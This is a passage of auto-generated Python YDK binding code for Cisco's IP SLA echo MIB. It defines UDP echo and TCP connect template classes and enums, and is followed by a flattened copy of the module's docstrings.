('cipslaudpechotmplsrcaddrtype', (YLeaf(YType.enumeration, 'cipslaUdpEchoTmplSrcAddrType'), [('ydk.models.cisco_ios_xe.INET_ADDRESS_MIB', 'InetAddressType', '')])),
('cipslaudpechotmplsrcaddr', (YLeaf(YType.str, 'cipslaUdpEchoTmplSrcAddr'), ['str'])),
('cipslaudpechotmplsrcport', (YLeaf(YType.uint16, 'cipslaUdpEchoTmplSrcPort'), ['int'])),
('cipslaudpechotmpltimeout', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplTimeOut'), ['int'])),
('cipslaudpechotmplverifydata', (YLeaf(YType.boolean, 'cipslaUdpEchoTmplVerifyData'), ['bool'])),
('cipslaudpechotmplreqdatasize', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplReqDataSize'), ['int'])),
('cipslaudpechotmpltos', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplTOS'), ['int'])),
('cipslaudpechotmplvrfname', (YLeaf(YType.str, 'cipslaUdpEchoTmplVrfName'), ['str'])),
('cipslaudpechotmplthreshold', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplThreshold'), ['int'])),
('cipslaudpechotmplhistlives', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplHistLives'), ['int'])),
('cipslaudpechotmplhistbuckets', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplHistBuckets'), ['int'])),
('cipslaudpechotmplhistfilter', (YLeaf(YType.enumeration, 'cipslaUdpEchoTmplHistFilter'), [('ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB', 'CISCOIPSLAECHOMIB', 'CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry.CipslaUdpEchoTmplHistFilter')])),
('cipslaudpechotmplstatshours', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplStatsHours'), ['int'])),
('cipslaudpechotmpldistbuckets', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplDistBuckets'), ['int'])),
('cipslaudpechotmpldistinterval', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplDistInterval'), ['int'])),
('cipslaudpechotmplstoragetype', (YLeaf(YType.enumeration, 'cipslaUdpEchoTmplStorageType'), [('ydk.models.cisco_ios_xe.SNMPv2_TC', 'StorageType', '')])),
('cipslaudpechotmplrowstatus', (YLeaf(YType.enumeration, 'cipslaUdpEchoTmplRowStatus'), [('ydk.models.cisco_ios_xe.SNMPv2_TC', 'RowStatus', '')])),
])
self.cipslaudpechotmplname = None
self.cipslaudpechotmpldescription = None
self.cipslaudpechotmplcontrolenable = None
self.cipslaudpechotmplsrcaddrtype = None
self.cipslaudpechotmplsrcaddr = None
self.cipslaudpechotmplsrcport = None
self.cipslaudpechotmpltimeout = None
self.cipslaudpechotmplverifydata = None
self.cipslaudpechotmplreqdatasize = None
self.cipslaudpechotmpltos = None
self.cipslaudpechotmplvrfname = None
self.cipslaudpechotmplthreshold = None
self.cipslaudpechotmplhistlives = None
self.cipslaudpechotmplhistbuckets = None
self.cipslaudpechotmplhistfilter = None
self.cipslaudpechotmplstatshours = None
self.cipslaudpechotmpldistbuckets = None
self.cipslaudpechotmpldistinterval = None
self.cipslaudpechotmplstoragetype = None
self.cipslaudpechotmplrowstatus = None
self._segment_path = lambda: "cipslaUdpEchoTmplEntry" + "[cipslaUdpEchoTmplName='" + str(self.cipslaudpechotmplname) + "']"
self._absolute_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB/cipslaUdpEchoTmplTable/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry, ['cipslaudpechotmplname', 'cipslaudpechotmpldescription', 'cipslaudpechotmplcontrolenable', 'cipslaudpechotmplsrcaddrtype', 'cipslaudpechotmplsrcaddr', 'cipslaudpechotmplsrcport', 'cipslaudpechotmpltimeout', 'cipslaudpechotmplverifydata', 'cipslaudpechotmplreqdatasize', 'cipslaudpechotmpltos', 'cipslaudpechotmplvrfname', 'cipslaudpechotmplthreshold', 'cipslaudpechotmplhistlives', 'cipslaudpechotmplhistbuckets', 'cipslaudpechotmplhistfilter', 'cipslaudpechotmplstatshours', 'cipslaudpechotmpldistbuckets', 'cipslaudpechotmpldistinterval', 'cipslaudpechotmplstoragetype', 'cipslaudpechotmplrowstatus'], name, value)
class CipslaUdpEchoTmplHistFilter(Enum):
"""
CipslaUdpEchoTmplHistFilter (Enum Class)
Defines a filter for adding RTT results to the history
buffer\:
none(1) \- no history is recorded
all(2) \- the results of all completion times
and failed completions are recorded
overThreshold(3) \- the results of completion times
over cipslaUdpEchoTmplThreshold are
recorded.
failures(4) \- the results of failed operations (only)
are recorded.
.. data:: none = 1
.. data:: all = 2
.. data:: overThreshold = 3
.. data:: failures = 4
"""
none = Enum.YLeaf(1, "none")
all = Enum.YLeaf(2, "all")
overThreshold = Enum.YLeaf(3, "overThreshold")
failures = Enum.YLeaf(4, "failures")
class CipslaTcpConnTmplTable(Entity):
"""
A table that contains TCP connect template specific definitions.
.. attribute:: cipslatcpconntmplentry
A row entry representing an IPSLA TCP connect template
**type**\: list of :py:class:`CipslaTcpConnTmplEntry <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable, self).__init__()
self.yang_name = "cipslaTcpConnTmplTable"
self.yang_parent_name = "CISCO-IPSLA-ECHO-MIB"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("cipslaTcpConnTmplEntry", ("cipslatcpconntmplentry", CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry))])
self._leafs = OrderedDict()
self.cipslatcpconntmplentry = YList(self)
self._segment_path = lambda: "cipslaTcpConnTmplTable"
self._absolute_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable, [], name, value)
class CipslaTcpConnTmplEntry(Entity):
"""
A row entry representing an IPSLA TCP connect template.
.. attribute:: cipslatcpconntmplname (key)
A string which specifies the TCP connect template name
**type**\: str
**length:** 1..64
.. attribute:: cipslatcpconntmpldescription
A string which provides description for the TCP connect template
**type**\: str
**length:** 0..128
.. attribute:: cipslatcpconntmplcontrolenable
If this object is enabled, then the IP SLA application will send control messages to a responder, residing on the target router to respond to the data request packets being sent by the source router
**type**\: bool
.. attribute:: cipslatcpconntmplsrcaddrtype
An enumerated value which specifies the IP address type of the source. It must be used along with the cipslaTcpConnTmplSrcAddr object
**type**\: :py:class:`InetAddressType <ydk.models.cisco_ios_xe.INET_ADDRESS_MIB.InetAddressType>`
.. attribute:: cipslatcpconntmplsrcaddr
A string which specifies the IP address of the source
**type**\: str
**length:** 0..255
.. attribute:: cipslatcpconntmplsrcport
This object represents the source's port number. If this object is not specified, the application will get a port allocated by the system
**type**\: int
**range:** 0..65535
.. attribute:: cipslatcpconntmpltimeout
Specifies the duration to wait for an IP SLA operation completion. For connection oriented protocols, this may cause the connection to be closed by the operation. Once closed, it will be assumed that the connection reestablishment will be performed. To prevent unwanted closure of connections, be sure to set this value to a realistic connection timeout
**type**\: int
**range:** 0..604800000
**units**\: milliseconds
.. attribute:: cipslatcpconntmplverifydata
When set to true, the resulting data in each IP SLA operation is compared with the expected data. This includes checking header information (if possible) and exact packet size
**type**\: bool
.. attribute:: cipslatcpconntmpltos
This object represents the type of service octet in an IP header
**type**\: int
**range:** 0..255
.. attribute:: cipslatcpconntmplthreshold
This object defines an administrative threshold limit. If the IP SLA operation time exceeds this limit and if the condition specified in cipslaTcpConnTmplHistFilter is satisfied, one threshold crossing occurrence will be counted
**type**\: int
**range:** 0..2147483647
**units**\: milliseconds
.. attribute:: cipslatcpconntmplhistlives
The maximum number of history lives to record. A life is defined by the countdown (or transition) to zero by the cipslaAutoGroupScheduleLife object. A new life is created when the same conceptual control row is restarted via the transition of the cipslaAutoGroupScheduleLife object and its subsequent countdown. The value of zero will shut off all data collection
**type**\: int
**range:** 0..2
.. attribute:: cipslatcpconntmplhistbuckets
The maximum number of history buckets to record. This value should be set to the number of operations to keep per lifetime. After cipslaTcpConnTmplHistBuckets are filled, the oldest entries are deleted and the most recent cipslaTcpConnTmplHistBuckets buckets are retained
**type**\: int
**range:** 1..60
.. attribute:: cipslatcpconntmplhistfilter
Defines a filter for adding RTT results to the history buffer\: none(1) \- no history is recorded all(2) \- the results of all completion times and failed completions are recorded overThreshold(3) \- the results of completion times over cipslaTcpConnTmplThreshold are recorded. failures(4) \- the results of failed operations (only) are recorded
**type**\: :py:class:`CipslaTcpConnTmplHistFilter <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry.CipslaTcpConnTmplHistFilter>`
.. attribute:: cipslatcpconntmplstatshours
The maximum number of hours for which statistics are maintained. Specifically this is the number of hourly groups to keep before rolling over. The value of one is not advisable because the hourly group will close and immediately be deleted before the network management station will have the opportunity to retrieve the statistics. The value of zero will shut off data collection
**type**\: int
**range:** 0..25
**units**\: hours
.. attribute:: cipslatcpconntmpldistbuckets
The maximum number of statistical distribution buckets to accumulate. Since this index does not rollover, only the first cipslaTcpConnTmplDistBuckets will be kept. The last cipslaTcpConnTmplDistBuckets will contain all entries from its distribution interval start point to infinity
**type**\: int
**range:** 1..20
.. attribute:: cipslatcpconntmpldistinterval
The statistical distribution buckets interval. Distribution Bucket Example\: cipslaTcpConnTmplDistBuckets = 5 buckets cipslaTcpConnTmplDistInterval = 10 milliseconds \| Bucket 1 \| Bucket 2 \| Bucket 3 \| Bucket 4 \| Bucket 5 \| \| 0\-9 ms \| 10\-19 ms \| 20\-29 ms \| 30\-39 ms \| 40\-Inf ms \| Odd Example\: cipslaTcpConnTmplDistBuckets = 1 buckets cipslaTcpConnTmplDistInterval = 10 milliseconds \| Bucket 1 \| \| 0\-Inf ms \| Thus, this odd example shows that the value of cipslaTcpConnTmplDistInterval does not apply when cipslaTcpConnTmplDistBuckets is one
**type**\: int
**range:** 1..100
**units**\: milliseconds
.. attribute:: cipslatcpconntmplstoragetype
The storage type of this conceptual row
**type**\: :py:class:`StorageType <ydk.models.cisco_ios_xe.SNMPv2_TC.StorageType>`
.. attribute:: cipslatcpconntmplrowstatus
The status of the conceptual tcp connect control row. When the status is active, all the read\-create objects in that row can be modified
**type**\: :py:class:`RowStatus <ydk.models.cisco_ios_xe.SNMPv2_TC.RowStatus>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry, self).__init__()
self.yang_name = "cipslaTcpConnTmplEntry"
self.yang_parent_name = "cipslaTcpConnTmplTable"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['cipslatcpconntmplname']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('cipslatcpconntmplname', (YLeaf(YType.str, 'cipslaTcpConnTmplName'), ['str'])),
('cipslatcpconntmpldescription', (YLeaf(YType.str, 'cipslaTcpConnTmplDescription'), ['str'])),
('cipslatcpconntmplcontrolenable', (YLeaf(YType.boolean, 'cipslaTcpConnTmplControlEnable'), ['bool'])),
('cipslatcpconntmplsrcaddrtype', (YLeaf(YType.enumeration, 'cipslaTcpConnTmplSrcAddrType'), [('ydk.models.cisco_ios_xe.INET_ADDRESS_MIB', 'InetAddressType', '')])),
('cipslatcpconntmplsrcaddr', (YLeaf(YType.str, 'cipslaTcpConnTmplSrcAddr'), ['str'])),
('cipslatcpconntmplsrcport', (YLeaf(YType.uint16, 'cipslaTcpConnTmplSrcPort'), ['int'])),
('cipslatcpconntmpltimeout', (YLeaf(YType.uint32, 'cipslaTcpConnTmplTimeOut'), ['int'])),
('cipslatcpconntmplverifydata', (YLeaf(YType.boolean, 'cipslaTcpConnTmplVerifyData'), ['bool'])),
('cipslatcpconntmpltos', (YLeaf(YType.uint32, 'cipslaTcpConnTmplTOS'), ['int'])),
('cipslatcpconntmplthreshold', (YLeaf(YType.uint32, 'cipslaTcpConnTmplThreshold'), ['int'])),
('cipslatcpconntmplhistlives', (YLeaf(YType.uint32, 'cipslaTcpConnTmplHistLives'), ['int'])),
('cipslatcpconntmplhistbuckets', (YLeaf(YType.uint32, 'cipslaTcpConnTmplHistBuckets'), ['int'])),
('cipslatcpconntmplhistfilter', (YLeaf(YType.enumeration, 'cipslaTcpConnTmplHistFilter'), [('ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB', 'CISCOIPSLAECHOMIB', 'CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry.CipslaTcpConnTmplHistFilter')])),
('cipslatcpconntmplstatshours', (YLeaf(YType.uint32, 'cipslaTcpConnTmplStatsHours'), ['int'])),
('cipslatcpconntmpldistbuckets', (YLeaf(YType.uint32, 'cipslaTcpConnTmplDistBuckets'), ['int'])),
('cipslatcpconntmpldistinterval', (YLeaf(YType.uint32, 'cipslaTcpConnTmplDistInterval'), ['int'])),
('cipslatcpconntmplstoragetype', (YLeaf(YType.enumeration, 'cipslaTcpConnTmplStorageType'), [('ydk.models.cisco_ios_xe.SNMPv2_TC', 'StorageType', '')])),
('cipslatcpconntmplrowstatus', (YLeaf(YType.enumeration, 'cipslaTcpConnTmplRowStatus'), [('ydk.models.cisco_ios_xe.SNMPv2_TC', 'RowStatus', '')])),
])
self.cipslatcpconntmplname = None
self.cipslatcpconntmpldescription = None
self.cipslatcpconntmplcontrolenable = None
self.cipslatcpconntmplsrcaddrtype = None
self.cipslatcpconntmplsrcaddr = None
self.cipslatcpconntmplsrcport = None
self.cipslatcpconntmpltimeout = None
self.cipslatcpconntmplverifydata = None
self.cipslatcpconntmpltos = None
self.cipslatcpconntmplthreshold = None
self.cipslatcpconntmplhistlives = None
self.cipslatcpconntmplhistbuckets = None
self.cipslatcpconntmplhistfilter = None
self.cipslatcpconntmplstatshours = None
self.cipslatcpconntmpldistbuckets = None
self.cipslatcpconntmpldistinterval = None
self.cipslatcpconntmplstoragetype = None
self.cipslatcpconntmplrowstatus = None
self._segment_path = lambda: "cipslaTcpConnTmplEntry" + "[cipslaTcpConnTmplName='" + str(self.cipslatcpconntmplname) + "']"
self._absolute_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB/cipslaTcpConnTmplTable/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry, ['cipslatcpconntmplname', 'cipslatcpconntmpldescription', 'cipslatcpconntmplcontrolenable', 'cipslatcpconntmplsrcaddrtype', 'cipslatcpconntmplsrcaddr', 'cipslatcpconntmplsrcport', 'cipslatcpconntmpltimeout', 'cipslatcpconntmplverifydata', 'cipslatcpconntmpltos', 'cipslatcpconntmplthreshold', 'cipslatcpconntmplhistlives', 'cipslatcpconntmplhistbuckets', 'cipslatcpconntmplhistfilter', 'cipslatcpconntmplstatshours', 'cipslatcpconntmpldistbuckets', 'cipslatcpconntmpldistinterval', 'cipslatcpconntmplstoragetype', 'cipslatcpconntmplrowstatus'], name, value)
class CipslaTcpConnTmplHistFilter(Enum):
"""
CipslaTcpConnTmplHistFilter (Enum Class)
Defines a filter for adding RTT results to the history
buffer\:
none(1) \- no history is recorded
all(2) \- the results of all completion times
and failed completions are recorded
overThreshold(3) \- the results of completion times
over cipslaTcpConnTmplThreshold are
recorded.
failures(4) \- the results of failed operations (only)
are recorded.
.. data:: none = 1
.. data:: all = 2
.. data:: overThreshold = 3
.. data:: failures = 4
"""
none = Enum.YLeaf(1, "none")
all = Enum.YLeaf(2, "all")
overThreshold = Enum.YLeaf(3, "overThreshold")
failures = Enum.YLeaf(4, "failures")
def clone_ptr(self):
self._top_entity = CISCOIPSLAECHOMIB()
return self._top_entity
| en | 0.665907 | CISCO_IPSLA_ECHO_MIB This MIB module defines the templates for IP SLA operations of ICMP echo, UDP echo and TCP connect. The ICMP echo operation measures end\-to\-end response time between a Cisco router and any IP enabled device by computing the time taken between sending an ICMP echo request message to the destination and receiving an ICMP echo reply. The UDP echo operation measures end\-to\-end response time between a Cisco router and any IP enabled device by computing the time taken between sending an UDP echo request message to the destination and receiving an UDP echo reply. The TCP connect operation measures end\-to\-end response time between a Cisco router and any IP enabled device by computing the time taken to perform a TCP connect operation. .. attribute:: cipslaicmpechotmpltable A table that contains ICMP echo template definitions **type**\: :py:class:`CipslaIcmpEchoTmplTable <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable>` .. attribute:: cipslaudpechotmpltable A table that contains UDP echo template specific definitions **type**\: :py:class:`CipslaUdpEchoTmplTable <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable>` .. attribute:: cipslatcpconntmpltable A table that contains TCP connect template specific definitions **type**\: :py:class:`CipslaTcpConnTmplTable <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable>` A table that contains ICMP echo template definitions. .. attribute:: cipslaicmpechotmplentry A row entry representing an IPSLA ICMP echo template **type**\: list of :py:class:`CipslaIcmpEchoTmplEntry <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry>` A row entry representing an IPSLA ICMP echo template. .. attribute:: cipslaicmpechotmplname (key) This field is used to specify the ICMP echo template name **type**\: str **length:** 1..64 .. attribute:: cipslaicmpechotmpldescription This field is used to provide description for the ICMP echo template **type**\: str **length:** 0..128 .. attribute:: cipslaicmpechotmplsrcaddrtype An enumerated value which specifies the IP address type of the source. It must be used along with the cipslaIcmpEchoTmplSrcAddr object **type**\: :py:class:`InetAddressType <ydk.models.cisco_ios_xe.INET_ADDRESS_MIB.InetAddressType>` .. attribute:: cipslaicmpechotmplsrcaddr A string which specifies the IP address of the source **type**\: str **length:** 0..255 .. attribute:: cipslaicmpechotmpltimeout Specifies the duration to wait for a IP SLA operation completion. For connection oriented protocols, this may cause the connection to be closed by the operation. Once closed, it will be assumed that the connection reestablishment will be performed. To prevent unwanted closure of connections, be sure to set this value to a realistic connection timeout **type**\: int **range:** 0..604800000 **units**\: milliseconds .. attribute:: cipslaicmpechotmplverifydata When set to true, the resulting data in each IP SLA operation is compared with the expected data. This includes checking header information (if possible) and exact packet size **type**\: bool .. attribute:: cipslaicmpechotmplreqdatasize This object represents the number of octets to be placed into the ARR Data portion of the request message, when using SNA protocols. For non\-ARR protocols' IP SLA request/responses, this value represents the native payload size. 
REMEMBER\: The ARR Header overhead is not included in this value **type**\: int **range:** 0..16384 **units**\: octets .. attribute:: cipslaicmpechotmpltos This object represents the type of service octet in an IP header **type**\: int **range:** 0..255 .. attribute:: cipslaicmpechotmplvrfname This field is used to specify the VRF name with which the IP SLA operation will be used. For regular IP SLA operation this field should not be configured. The agent will use this field to identify the VRF routing table for this operation **type**\: str **length:** 0..32 .. attribute:: cipslaicmpechotmplthreshold This object defines an administrative threshold limit. If the IP SLA operation time exceeds this limit and if the condition specified in cipslaIcmpEchoTmplHistFilter is satisfied, one threshold crossing occurrence will be counted **type**\: int **range:** 0..2147483647 **units**\: milliseconds .. attribute:: cipslaicmpechotmplhistlives The maximum number of history lives to record. A life is defined by the countdown (or transition) to zero by the cipslaAutoGroupScheduleLife object. A new life is created when the same conceptual control row is restarted via the transition of the cipslaAutoGroupScheduleLife object and its subsequent countdown. The value of zero will shut off all data collection **type**\: int **range:** 0..2 .. attribute:: cipslaicmpechotmplhistbuckets The maximum number of history buckets to record. This value is set to the number of operations to keep per lifetime. After cipslaIcmpEchoTmplHistBuckets are filled, the oldest entries are deleted and the most recent cipslaIcmpEchoTmplHistBuckets buckets are retained **type**\: int **range:** 1..60 .. attribute:: cipslaicmpechotmplhistfilter Defines a filter for adding RTT results to the history buffer\: none(1) \- no history is recorded all(2) \- the results of all completion times and failed completions are recorded overThreshold(3) \- the results of completion times over cipslaIcmpEchoTmplThreshold are recorded. failures(4) \- the results of failed operations (only) are recorded **type**\: :py:class:`CipslaIcmpEchoTmplHistFilter <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry.CipslaIcmpEchoTmplHistFilter>` .. attribute:: cipslaicmpechotmplstatshours The maximum number of hours for which statistics are maintained. Specifically this is the number of hourly groups to keep before rolling over. The value of one is not advisable because the hourly group will close and immediately be deleted before the network management station will have the opportunity to retrieve the statistics. The value of zero will shut off data collection **type**\: int **range:** 0..25 **units**\: hours .. attribute:: cipslaicmpechotmpldistbuckets The maximum number of statistical distribution buckets to accumulate. Since this index does not rollover, only the first cipslaIcmpEchoTmplStatsNumDistBuckets will be kept. The last cipslaIcmpEchoTmplStatsNumDistBucket will contain all entries from its distribution interval start point to infinity **type**\: int **range:** 1..20 .. attribute:: cipslaicmpechotmpldistinterval The statistical distribution buckets interval. 
Distribution Bucket Example\: cipslaIcmpEchoTmplDistBuckets = 5 buckets cipslaIcmpEchoTmplDistInterval = 10 milliseconds \| Bucket 1 \| Bucket 2 \| Bucket 3 \| Bucket 4 \| Bucket 5 \| \| 0\-9 ms \| 10\-19 ms \| 20\-29 ms \| 30\-39 ms \| 40\-Inf ms \| Odd Example\: cipslaIcmpEchoTmplDistBuckets = 1 buckets cipslaIcmpEchoTmplDistInterval = 10 milliseconds \| Bucket 1 \| \| 0\-Inf ms \| Thus, this odd example shows that the value of cipslaIcmpEchoTmplDistInterval does not apply when cipslaIcmpEchoTmplDistBuckets is one **type**\: int **range:** 1..100 **units**\: milliseconds .. attribute:: cipslaicmpechotmplstoragetype The storage type of this conceptual row **type**\: :py:class:`StorageType <ydk.models.cisco_ios_xe.SNMPv2_TC.StorageType>` .. attribute:: cipslaicmpechotmplrowstatus The status of the conceptual ICMP echo template control row. When the status is active, all the read\-create objects in that row can be modified **type**\: :py:class:`RowStatus <ydk.models.cisco_ios_xe.SNMPv2_TC.RowStatus>` CipslaIcmpEchoTmplHistFilter (Enum Class) Defines a filter for adding RTT results to the history buffer\: none(1) \- no history is recorded all(2) \- the results of all completion times and failed completions are recorded overThreshold(3) \- the results of completion times over cipslaIcmpEchoTmplThreshold are recorded. failures(4) \- the results of failed operations (only) are recorded. .. data:: none = 1 .. data:: all = 2 .. data:: overThreshold = 3 .. data:: failures = 4 A table that contains UDP echo template specific definitions. .. attribute:: cipslaudpechotmplentry A row entry representing an IPSLA UDP echo template **type**\: list of :py:class:`CipslaUdpEchoTmplEntry <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry>` A row entry representing an IPSLA UDP echo template. .. attribute:: cipslaudpechotmplname (key) A string which specifies the UDP echo template name **type**\: str **length:** 1..64 .. attribute:: cipslaudpechotmpldescription A string which provides description to the UDP echo template **type**\: str **length:** 0..128 .. attribute:: cipslaudpechotmplcontrolenable If this object is enabled, then the IP SLA application will send control messages to a responder, residing on the target router to respond to the data request packets being sent by the source router **type**\: bool .. attribute:: cipslaudpechotmplsrcaddrtype An enumerated value which specifies the IP address type of the source. It must be used along with the cipslaUdpEchoTmplSrcAddr object **type**\: :py:class:`InetAddressType <ydk.models.cisco_ios_xe.INET_ADDRESS_MIB.InetAddressType>` .. attribute:: cipslaudpechotmplsrcaddr A string which specifies the IP address of the source **type**\: str **length:** 0..255 .. attribute:: cipslaudpechotmplsrcport This object represents the source's port number. If this object is not specified, the application will get a port allocated by the system **type**\: int **range:** 0..65535 .. attribute:: cipslaudpechotmpltimeout Specifies the duration to wait for an IP SLA operation completion. For connection oriented protocols, this may cause the connection to be closed by the operation. Once closed, it will be assumed that the connection reestablishment will be performed. To prevent unwanted closure of connections, be sure to set this value to a realistic connection timeout **type**\: int **range:** 0..604800000 **units**\: milliseconds .. 
attribute:: cipslaudpechotmplverifydata When set to true, the resulting data in each IP SLA operation is compared with the expected data. This includes checking header information (if possible) and exact packet size **type**\: bool .. attribute:: cipslaudpechotmplreqdatasize This object represents the number of octets to be placed into the ARR Data portion of the request message, when using SNA protocols. For non\-ARR protocols' RTT request/responses, this value represents the native payload size. REMEMBER\: The ARR Header overhead is not included in this value **type**\: int **range:** 4..1500 **units**\: octets .. attribute:: cipslaudpechotmpltos This object represents the type of service octet in an IP header **type**\: int **range:** 0..255 .. attribute:: cipslaudpechotmplvrfname This field is used to specify the VRF name with which the IP SLA operation will be used. For regular IP SLA operation this field should not be configured. The agent will use this field to identify the VRF routing Table for this operation **type**\: str **length:** 0..32 .. attribute:: cipslaudpechotmplthreshold This object defines an administrative threshold limit. If the IP SLA operation time exceeds this limit and if the condition specified in cipslaUdpEchoTmplHistFilter is satisfied, one threshold crossing occurrence will be counted **type**\: int **range:** 0..2147483647 **units**\: milliseconds .. attribute:: cipslaudpechotmplhistlives The maximum number of history lives to record. A life is defined by the countdown (or transition) to zero by the cipslaAutoGroupScheduleLife object. A new life is created when the same conceptual control row is restarted via the transition of the cipslaAutoGroupScheduleLife object and its subsequent countdown. The value of zero will shut off all data collection **type**\: int **range:** 0..2 .. attribute:: cipslaudpechotmplhistbuckets The maximum number of history buckets to record. This value should be set to the number of operations to keep per lifetime. After cipslaUdpEchoTmplHistBuckets are filled, the oldest entries are deleted and the most recent cipslaUdpEchoTmplHistBuckets buckets are retained **type**\: int **range:** 1..60 .. attribute:: cipslaudpechotmplhistfilter Defines a filter for adding RTT results to the history buffer\: none(1) \- no history is recorded all(2) \- the results of all completion times and failed completions are recorded overThreshold(3) \- the results of completion times over cipslaUdpEchoTmplThreshold are recorded. failures(4) \- the results of failed operations (only) are recorded **type**\: :py:class:`CipslaUdpEchoTmplHistFilter <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry.CipslaUdpEchoTmplHistFilter>` .. attribute:: cipslaudpechotmplstatshours The maximum number of hours for which statistics are maintained. Specifically this is the number of hourly groups to keep before rolling over. The value of one is not advisable because the hourly group will close and immediately be deleted before the network management station will have the opportunity to retrieve the statistics. The value of zero will shut off data collection **type**\: int **range:** 0..25 **units**\: hours .. attribute:: cipslaudpechotmpldistbuckets The maximum number of statistical distribution buckets to accumulate. Since this index does not rollover, only the first cipslaUdpEchoTmplStatsNumDistBuckets will be kept. 
The last cipslaUdpEchoTmplStatsNumDistBuckets will contain all entries from its distribution interval start point to infinity **type**\: int **range:** 1..20 .. attribute:: cipslaudpechotmpldistinterval The statistical distribution buckets interval. Distribution Bucket Example\: cipslaUdpEchoTmplDistBuckets = 5 buckets cipslaUdpEchoTmplDistInterval = 10 milliseconds \| Bucket 1 \| Bucket 2 \| Bucket 3 \| Bucket 4 \| Bucket 5 \| \| 0\-9 ms \| 10\-19 ms \| 20\-29 ms \| 30\-39 ms \| 40\-Inf ms \| Odd Example\: cipslaUdpEchoTmplDistBuckets = 1 buckets cipslaUdpEchoTmplDistInterval = 10 milliseconds \| Bucket 1 \| \| 0\-Inf ms \| Thus, this odd example shows that the value of cipslaUdpEchoTmplDistInterval does not apply when cipslaUdpEchoTmplDistBuckets is one **type**\: int **range:** 1..100 **units**\: milliseconds .. attribute:: cipslaudpechotmplstoragetype The storage type of this conceptual row **type**\: :py:class:`StorageType <ydk.models.cisco_ios_xe.SNMPv2_TC.StorageType>` .. attribute:: cipslaudpechotmplrowstatus The status of the conceptual UDP echo template control row. When the status is active, all the read\-create objects in that row can be modified **type**\: :py:class:`RowStatus <ydk.models.cisco_ios_xe.SNMPv2_TC.RowStatus>` CipslaUdpEchoTmplHistFilter (Enum Class) Defines a filter for adding RTT results to the history buffer\: none(1) \- no history is recorded all(2) \- the results of all completion times and failed completions are recorded overThreshold(3) \- the results of completion times over cipslaUdpEchoTmplThreshold are recorded. failures(4) \- the results of failed operations (only) are recorded. .. data:: none = 1 .. data:: all = 2 .. data:: overThreshold = 3 .. data:: failures = 4 A table that contains TCP connect template specific definitions. .. attribute:: cipslatcpconntmplentry A row entry representing an IPSLA TCP connect template **type**\: list of :py:class:`CipslaTcpConnTmplEntry <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry>` A row entry representing an IPSLA TCP connect template. .. attribute:: cipslatcpconntmplname (key) A string which specifies the TCP connect template name **type**\: str **length:** 1..64 .. attribute:: cipslatcpconntmpldescription A string which provides description for the TCP connect template **type**\: str **length:** 0..128 .. attribute:: cipslatcpconntmplcontrolenable If this object is enabled, then the IP SLA application will send control messages to a responder, residing on the target router to respond to the data request packets being sent by the source router **type**\: bool .. attribute:: cipslatcpconntmplsrcaddrtype An enumerated value which specifies the IP address type of the source. It must be used along with the cipslaTcpConnTmplSrcAddr object **type**\: :py:class:`InetAddressType <ydk.models.cisco_ios_xe.INET_ADDRESS_MIB.InetAddressType>` .. attribute:: 